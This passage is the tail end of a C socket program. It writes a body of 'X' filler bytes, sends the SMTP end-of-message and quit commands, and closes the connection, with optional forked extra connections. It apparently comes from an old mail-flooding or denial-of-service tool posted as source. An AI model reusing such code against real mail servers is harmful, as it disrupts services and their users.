    /* BSIZE bytes of 'X' as the message body (x<BSIZE: the original's x<=BSIZE wrote one byte past the buffer) */
    for (x=0;x<BSIZE;x++)
      buffer[x]='X';
    write(sockfd,buffer,BSIZE);
    say("\n.\n");
    sleep(1);
    say("quit\n");
    shutdown(sockfd,2);
    close(sockfd);
#ifdef VERBOSE
    fprintf(stderr,">Connection closed successfully.\n");
#endif
  }
#ifdef MORECONN
  }
  waitpid(chpid,NULL,0);
#endif
  return 0;
}
--- CUT HERE ---